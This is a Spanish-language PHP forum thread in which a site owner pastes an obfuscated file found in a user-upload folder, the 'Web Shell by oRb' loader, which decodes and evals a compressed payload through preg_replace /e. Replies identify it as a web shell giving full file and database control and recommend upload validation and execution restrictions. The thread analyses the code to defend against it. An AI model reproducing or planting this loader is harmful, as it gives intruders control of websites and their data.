Foros del Web » Programando para Internet » PHP »

Intento de hackeo en sitio web

Estas en el tema de Intento de hackeo en sitio web en el foro de PHP en Foros del Web. Hola buen día. Hoy en una de mis webs encontré el siguiente código en uno de los directorios donde se encuentran los archivos que suben ...
  #1 (permalink)  
Antiguo 04/02/2012, 12:08
 
Fecha de Ingreso: junio-2010
Mensajes: 97
Antigüedad: 12 años, 7 meses
Puntos: 5
Intento de hackeo en sitio web

Hola buen día.

Hoy en una de mis webs encontré el siguiente código en uno de los directorios donde se encuentran los archivos que suben los usuarios por medio de un formulario y me gustaría saber qué hace:

<?php # Web Shell by oRb

//$auth_pass = "63a9f0ea7bb98050796b649e85481845";

$color = "#df5";

$default_action = 'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x 61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65 \x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2 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 ga+N109hz7ZxquK3th0DJ72BBbeY...

...
Fz+YglbQE7EXOqLbMRTRwYu1R5CeSSqLu8vuthnVjrPo/eGFLgRPNXh7xsmiBHH1AC0T9z+AcaK5wplaYmmI8QMy6hJN6vv +H4XL9FdLFUEiippqKn6fwE='\x29\x29\x29\x3B",".");?>
  #2 (permalink)  
Antiguo 04/02/2012, 12:32
Avatar de GatorV
$this->role('moderador');
 
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 16 años, 8 meses
Puntos: 2135
Respuesta: Intento de hackeo en sitio web

Pues por lo que dice en el primer comentario, es un Web Shell, son scripts PHP que te permiten hacer todo en tu sitio, como subir, borrar, mover archivos, bajarlos, y acceso a MySQL. Es como un CPanel que le permite al hacker hacer todo en tu sitio.

Saludos.
  #3 (permalink)  
Antiguo 04/02/2012, 17:05
Avatar de efex_  
Fecha de Ingreso: noviembre-2011
Mensajes: 17
Antigüedad: 11 años, 2 meses
Puntos: 4
Respuesta: Intento de hackeo en sitio web

XSS, RFI, inyeccion Mysql(quizas) son vulnerabilidades que debes de tener en cuenta.
  #4 (permalink)  
Antiguo 05/02/2012, 13:36
Avatar de gildus  
Fecha de Ingreso: agosto-2003
Mensajes: 1.495
Antigüedad: 19 años, 6 meses
Puntos: 105
Respuesta: Intento de hackeo en sitio web

Holas,

Parece que este es el php desofuscado:

http://pastie.org/1058996

Es raro que tengas un formulario para subir archivo y sobre todo PHP, seria bueno, creo que controles los permisos y funciones de ejecucion en php.

Saludos
__________________
.: Gildus :.
  #5 (permalink)  
Antiguo 05/02/2012, 22:30
Avatar de Nemutagk
Colaborador
 
Fecha de Ingreso: marzo-2004
Ubicación: México
Mensajes: 2.633
Antigüedad: 18 años, 10 meses
Puntos: 406
Respuesta: Intento de hackeo en sitio web

Impresionante el script, de los mas completos que eh visto, y tal como dice @gildus, debes SIEMPRE desconfiar de todos tus usuarios, verificar permisos y sobre todo, si vas a subir archivos verificar siempre el tipo de archivo a subir
__________________
Listo?, tendría que tener 60 puntos menos de IQ para considerarme listo!!!
-- Sheldon Cooper
http://twitter.com/nemutagk
PD: No contestaré temas vía mensaje personal =)
  #6 (permalink)  
Antiguo 06/02/2012, 00:50
 
Fecha de Ingreso: septiembre-2007
Ubicación: PyRoot
Mensajes: 1.515
Antigüedad: 15 años, 4 meses
Puntos: 188
Respuesta: Intento de hackeo en sitio web

Hola akus... amm... Me puedes pasar el link del formulario donde se sube los archivos :D ?
Bueno es broma, Pero enserio tienes que validar que tipo de archivos vas a permitir que suban los usuarios, que bueno que te diste cuenta a tiempo. Borra ese archivo y modificar tu script PHP o borrar tambien tu formulario con el que suben los usuarios mientras averiguas esto de validar los tipos de archivos y/o como dar permisos a los directorios.

Saludos.
__________________
Si quieres agradecer el triangulo obscuro de la parte derecha debes presionar +.
  #7 (permalink)  
Antiguo 07/02/2012, 19:09
Avatar de catpaw  
Fecha de Ingreso: mayo-2010
Ubicación: xalapa
Mensajes: 856
Antigüedad: 12 años, 8 meses
Puntos: 23
Respuesta: Intento de hackeo en sitio web

Hola me interesa este tema mucho, todos sugieren cambiar permisos, validar tipos de archivos, controlar funciones de ejecucion etc.

pero nadie pone como...al menos en esto de la seguridad yo y al parecer igual que el compañero somos novatos

les agradeceria que nos pusieran algun ejemplo, enlace, tutorial, manual o algo para orientarnos

gracias
  #8 (permalink)  
Antiguo 07/02/2012, 19:39
Avatar de gildus  
Fecha de Ingreso: agosto-2003
Mensajes: 1.495
Antigüedad: 19 años, 6 meses
Puntos: 105
Respuesta: Intento de hackeo en sitio web

Holas,

Tal vez con una simple busqueda en el foro en general podrias tener una mejor recoleccion de varias experiencias y temas tratados y que es en este caso con PHP; la mejor forma (creo yo) de tener mas seguridad en tus script es con la practica, respetando patrones de programacion, programando con las buenas practicas. Por ejemplo existen frameworks que trabaja en esos temas por ejemplo de validaciones, permisos, tipos de archivo, funciones, etc. son detalles que ya otros trabajan, una comunidad trabajando en ello, pero no quiere decir que se sepa sino para tomar de referencia.

Ejemplos, manueles, tutoriales, links, etc. en google los encuentras en muchisimos idiomas. Existe una seccion de tutoriales del Foro sobre PHP que creo que puede ayudarnos para empezar.

http://www.forosdelweb.com/f18/aport...as-php-569025/

http://www.forosdelweb.com/f18/indice-faqs-php-108208/

http://www.forosdelweb.com/wiki/Categor%C3%ADa:Manuales

http://www.php.net/manual/es/security.php


Saludos
__________________
.: Gildus :.
  #9 (permalink)  
Antiguo 07/02/2012, 19:45
Avatar de catpaw  
Fecha de Ingreso: mayo-2010
Ubicación: xalapa
Mensajes: 856
Antigüedad: 12 años, 8 meses
Puntos: 23
Respuesta: Intento de hackeo en sitio web

Gracias, yo me refería de acuerdo a su experiencia para saber hacia donde enfocar nuestros mayores esfuerzos...

me pondré a leer lo que pones y les comento Saludos!

Etiquetas: formulario, intento, sql, usuarios
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta

SíEste tema le ha gustado a 2 personas




La zona horaria es GMT -6. Ahora son las 21:25.